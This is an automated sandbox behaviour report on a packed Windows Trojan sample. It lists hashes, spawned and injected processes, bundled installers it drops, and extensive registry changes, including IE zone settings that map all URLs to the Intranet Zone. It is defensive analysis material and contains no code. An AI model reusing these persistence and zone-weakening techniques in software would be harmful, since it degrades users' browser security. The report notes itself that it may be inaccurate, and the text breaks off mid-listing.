Gen:Variant.Adware.Graftor.167470 (B) (Emsisoft), Gen:Variant.Adware.Graftor.167470 (AdAware), Backdoor.Win32.Farfli.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor, Worm, EmailWorm, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a6590134fc71addea0a3adac511f2071
SHA1: 2a56335dbee6673754e718854f279f9a18ab21c6
SHA256: b9f9e1d29939971aa038c5f5db14df9e7cbab3efdf4b6d2717ab2c497ceb1422
SSDeep: 12288:p wqYiMjW3Y6i2JfOeZgNeiRDE3gemnNR :QwqYna3d2eZgNeiRQ3ge0Y
Size: 474112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-20 03:41:40
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
taskkill.exe:1876
taskkill.exe:1492
taskkill.exe:1840
taskkill.exe:580
KuaiZip_Setup_union123_0088.exe:552
KZReport.exe:892
net1.exe:1484
ping.exe:468
KuaiZip.exe:856
net.exe:1864
regsvr32.exe:604
regsvr32.exe:1676
regsvr32.exe:628
regsvr32.exe:1460
LockPage.exe:1212
at.exe:1788
at.exe:496
The Trojan injects its code into the following process(es):
duba_u20862342_sv1_3_18.exe:632
%original file name%.exe:756
2345pic_k1252705.exe:1360
Mutexes
The following mutexes were created/opened:
WininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!_!MSFTHISTORY!_c:!documents and settings!adm!local settings!temporary internet files!content.ie5!ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexRasPbFileShimCacheMutex
File activity
The process KuaiZip_Setup_union123_0088.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\¿ìѹ\data\slimdata.dat (784 bytes)
%Program Files%\¿ìѹ\ErrorMsg.xml (196 bytes)
%Program Files%\¿ìѹ\readme.txt (1 bytes)
%Program Files%\¿ìѹ\X86\KZReport.exe (7523 bytes)
%Program Files%\¿ìѹ\X86\Uninst.exe (8994 bytes)
%Program Files%\¿ìѹ\7zNew.dat (32 bytes)
%Program Files%\¿ìѹ\X86\SetupHelper.exe (863 bytes)
%Program Files%\¿ìѹ\X86\KZMount2.exe (3478 bytes)
%Program Files%\¿ìѹ\X86\reportframework.dll (7405 bytes)
%Program Files%\¿ìѹ\X86\sfx\kzSetup_chs.sfx (5506 bytes)
%Program Files%\¿ìѹ\SLDefault.xml (196 bytes)
%Program Files%\¿ìѹ\X86\KZModule.dll (6778 bytes)
%Program Files%\¿ìѹ\X86\KZipShell.dll (3047 bytes)
%Program Files%\¿ìѹ\ali\kzshop.ico (1686 bytes)
%Program Files%\¿ìѹ\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\¿ìѹ.lnk (661 bytes)
%Program Files%\¿ìѹ\X86\KZFormat.dll (2224 bytes)
%Program Files%\¿ìѹ\skin\disopt.skn (3635 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll (393 bytes)
%Program Files%\¿ìѹ\X86\Mount.dll (1686 bytes)
%Program Files%\¿ìѹ\X86\finderlib.dll (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z.MD5 (33 bytes)
%Program Files%\¿ìѹ\X86\KuaiZip.exe (12581 bytes)
%Program Files%\¿ìѹ\KzNew.dat (74 bytes)
%Program Files%\¿ìѹ\ZipNew.dat (22 bytes)
%Program Files%\¿ìѹ\X86\MountCore.dll (1059 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (38588 bytes)
%Program Files%\¿ìѹ\__-________.URL (49 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z (38588 bytes)
%Program Files%\¿ìѹ\X86\DiskOpt.exe (4801 bytes)
%Documents and Settings%\%current user%\Start Menu\¿ìѹ.lnk (661 bytes)
%Program Files%\¿ìѹ\X86\UpdateChecker.exe (4527 bytes)
%Program Files%\¿ìѹ\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\¿ìѹ\X86\KZTui.exe (4527 bytes)
%Program Files%\¿ìѹ\X86\Update.exe (7758 bytes)
%Program Files%\¿ìѹ\X86\DuiLib.dll (4801 bytes)
%Program Files%\¿ìѹ\ali\jp.png (392 bytes)
%Program Files%\¿ìѹ\X86\lang\Chs_Lang.dll (1020 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (0 bytes)
The process KuaiZip.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)
The process %original file name%.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\js1[1] (623688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\bjzy3[1] (147925 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\js2[1] (664204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\js3[1] (672184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l5qvobehj20c80gbnpk[1].jpg (367545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\6da25678gw1f1l8xa7bhsj20c80gbu12[1].jpg (648672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\uc2[1] (947341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\uc3[1] (547626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1la7wjwlnj20c80gbnpj[1].jpg (787198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\uc1[1] (911426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l8knvnatj20c80gbu12[1].jpg (680643 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Desktop\¿ìѹ.lnk (0 bytes)
The process 2345pic_k1252705.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (39245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll (36078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\modern-header.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\FileInfo.dll (4992 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
The process LockPage.exe:1212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\System\safemonn32.dll (180 bytes)
%Program Files%\Common Files\System\config.dat (143 bytes)
%Program Files%\Common Files\System\safe.dat (3719 bytes)
%Program Files%\Common Files\System\OverlayIcon.dll (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.dat (3719 bytes)
C:\unit.bat (103 bytes)
Registry activity
The process taskkill.exe:1876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 58 3C 46 AC 14 ED C7 61 3B B0 11 80 51 4E D3"
The process taskkill.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E B4 8A 9F A5 04 F7 BA 1D E6 6E CE C2 75 FA A3"
The process taskkill.exe:1840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 9E 43 DA F3 46 11 CB 18 E1 CC F5 98 5F E3 F7"
The process taskkill.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 DD 96 53 8A 82 6F EE 5F B5 10 C7 2F 53 50 3B"
The process KuaiZip_Setup_union123_0088.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"sfx" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayIcon" = "%Program Files%\¿ìѹ\X86\Uninst.exe"
[HKCU\Software\KuaiZipSFX\¿ìѹ]
"ChannelID" = "union123_0088"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"Mount.dll" = "0"
[HKCU\Software\SNDA]
"PCID" = "J630eda2537585b8645a6e7879b8a0d8b205ed5f8bb90ef1b5872e8e742772757"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86\lang]
"Chs_Lang.dll" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"readme.txt" = "0"
"x86" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"InstallDate" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"快压-压缩和解压缩利器.URL" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\¿ìѹ\X86]
"KZReport.exe" = "KZReport"
[HKCU\Software\KuaiZip\Install]
"p_c" = "FA FD 39 AC 0B 9D 7B 13 49 92 B6 B2 3F 23 0B 0C"
"p_d" = "C5 2F 64 ED 43 DA 8B 17 D5 D8 81 BC 1C 20 80 76"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"SendEverBox" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCR\.zip\ShellNew]
"FileName" = "%Program Files%\¿ìѹ\zipnew.dat"
[HKCU\Software\KuaiZip\Install]
"p_m" = "43 70 B4 95 6B E8 63 CA E7 DA 7A E0 7D 7F D0 53"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZMount2.exe" = "0"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\¿ìѹ\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayName" = "¿ìѹ"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"DuiLib.dll" = "0"
"KuaiZip.exe" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\KuaiZip\Install]
"InstallCount" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\KuaiZip\Install]
"Version" = "2.8.14.2"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\skin]
"disopt.skn" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ]
"Version" = "2.8.14.2"
[HKCU\Software\KuaiZip\Install]
"md5" = "E4283218755BC37E5CA88875F91BE373"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\KuaiZip\Install]
"Path" = "%Program Files%\¿ìѹ\"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"lang" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"AppendMenu" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"data" = "0"
[HKCU\Software\KuaiZip\Report\offline\install]
"Code" = "0B 30 3D 16 08 58 73 AC 80 52 4A FE 81 44 4F 6F"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZFormat.dll" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"7zNew.dat" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"kuaizipUpdateChecker.dll" = "0"
"update.exe" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 39 5A 69 51 B0 78 6E 94 8B EC 9F 93 B4 AD 45"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"skin" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"SetupHelper.exe" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\¿ìѹ\X86]
"KuaiZip.exe" = "KuaiZip Application"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"reportframework.dll" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\ali]
"jp.png" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KuaiZipDrive.sys" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"StoreOnly" = "*.MPEG *.MPG *.DAT *.avi *.mov *.asf *.3gp *.mkv *.flv *.ra *.rm *.ram *.aiff *.au *.midi *.vqf *.ogg *.mid *.aac *.ape"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"DiskOpt.exe" = "0"
"7z.dll" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"SLDefault.xml" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"finderlib.dll" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ]
"Path" = "%Program Files%\¿ìѹ\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"uninst.exe" = "0"
[HKCU\Software\KuaiZip\Install]
"InstallDate" = "160411"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Name" = "ѹËõ²¢Ãë´«·ÖÃÂÂøøºÃÓÑ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"UninstallString" = "%Program Files%\¿ìѹ\X86\Uninst.exe"
"DisplayVersion" = "2.8.14.2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"MountCore.dll" = "0"
[HKCR\.7z\ShellNew]
"FileName" = "%Program Files%\¿ìѹ\7znew.dat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"LastUpdateDate" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"ali" = "0"
"KzNew.dat" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"ExeImmi" = "1"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZipShell.dll" = "0"
"KZReport.exe" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"AT.exe" = "Schedule service command line interface"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"ZipNew.dat" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.kz\ShellNew]
"FileName" = "%Program Files%\¿ìѹ\KzNew.dat"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZModule.dll" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\KuaiZip\Install]
"qid" = "union123_0088"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"UpdateChecker.exe" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\KuaiZip\Report]
"TimeStamp" = "1460397275"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86\sfx]
"kzSetup_chs.sfx" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\ali]
"kzshop.ico" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZTui.exe" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\data]
"slimdata.dat" = "0"
[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"ErrorMsg.xml" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\KuaiZip\Report\offline\install]
"Path" = "72 34 FE 03 DC A6 9E A4 8F 09 CE 4E 34 23 3D 7F"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Default" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"Publisher" = "上海广ä¹ÂÂ网络科技有é™ÂÂå…¬å¸"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\KuaiZip]
[HKCU\Software\KuaiZip\Report]
The process KZReport.exe:892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 96 C7 88 67 41 F8 D9 01 9F B5 E4 54 F8 DC FF"
[HKCU\Software\KuaiZip\Report]
"OnlineLastDate" = "2016/04/11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\KuaiZip\Report]
"LastQueryDate" = "2016/04/11"
"Desktop" = "2016/04/11"
"DefaultSoftTimestamp" = "1460397302"
The Trojan deletes the following registry key(s):
[HKCU\Software\KuaiZip\Report\offline\install]
The process net1.exe:1484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 83 7E DB DE 6E 05 34 0F 75 02 D6 7D 11 1A E9"
The process ping.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 23 FF D9 4D 1A F4 F9 16 97 39 5B 19 74 50 78"
The process duba_u20862342_sv1_3_18.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 2E 02 E3 93 B4 08 5F 4E C6 40 37 B6 4B 15 07"
The process KuaiZip.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\KuaiZip_FileAsso.Origin\.002]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.004]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.087]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.027]
"(Default)" = "快压 027 压缩文件"
[HKCR\KuaiZip.gz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.004\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.039]
"(Default)" = "KuaiZip.039"
[HKCR\KuaiZip.081\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.074\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.061]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.013]
"set" = "1"
[HKCR\KuaiZip.025]
"(Default)" = "快压 025 压缩文件"
[HKCR\KuaiZip.083\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.051]
"(Default)" = "KuaiZip.051"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.057]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.082]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\KuaiZip_FileAsso.Origin\.098]
"(Default)" = "NoAssociate.KZ"
[HKCR\.017]
"(Default)" = "KuaiZip.017"
[HKCR\.021]
"(Default)" = "KuaiZip.021"
[HKCR\KuaiZip.mou\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.06\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.095]
"(Default)" = "NoAssociate.KZ"
[HKCR\.061]
"(Default)" = "KuaiZip.061"
[HKCR\.001]
"(Default)" = "KuaiZip.001"
[HKCR\KuaiZip.038\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.040\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.086]
"(Default)" = "KuaiZip.086"
[HKCR\KuaiZip_FileAsso.Origin\.03]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.055]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.059]
"set" = "1"
[HKCR\.031]
"(Default)" = "KuaiZip.031"
[HKCR\KuaiZip_FileAsso.Origin\.021]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.014]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.086]
"set" = "1"
[HKCR\KuaiZip.kz]
"(Default)" = "快压 KZ 压缩文件"
[HKCR\KuaiZip.096]
"(Default)" = "快压 096 压缩文件"
[HKCR\KuaiZip.066\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.069]
"(Default)" = "快压 069 压缩文件"
[HKCR\.097]
"(Default)" = "KuaiZip.097"
[HKCR\KuaiZip.047]
"(Default)" = "快压 047 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.arj]
"set" = "1"
[HKCR\KuaiZip.zip\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,2"
[HKCR\KuaiZip.026\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.z\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.tar]
"(Default)" = "KuaiZip.tar"
[HKCR\.007]
"(Default)" = "KuaiZip.007"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.037]
"set" = "1"
[HKCR\.067]
"(Default)" = "KuaiZip.067"
[HKCR\KuaiZip.024]
"(Default)" = "快压 024 压缩文件"
[HKCR\KuaiZip.bz2\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.035\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.08]
"(Default)" = "快压 08 压缩文件"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.03]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.tar]
"set" = "1"
[HKCR\KuaiZip.rpm\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.059]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.052\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.03\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.071\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.025]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.bz2]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.050]
"set" = "1"
[HKCR\KuaiZip.011\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.060]
"(Default)" = "KuaiZip.060"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.z]
"set" = "1"
[HKCR\KuaiZip.041\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.012\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.028\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.010]
"(Default)" = "KuaiZip.010"
[HKCR\KuaiZip.073]
"(Default)" = "快压 073 压缩文件"
[HKCR\.047]
"(Default)" = "KuaiZip.047"
[HKCR\KuaiZip.028\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.016\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.02\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.038\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.046\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.066]
"(Default)" = "KuaiZip.066"
[HKCR\.07]
"(Default)" = "KuaiZip.07"
[HKCR\.076]
"(Default)" = "KuaiZip.076"
[HKCR\.090]
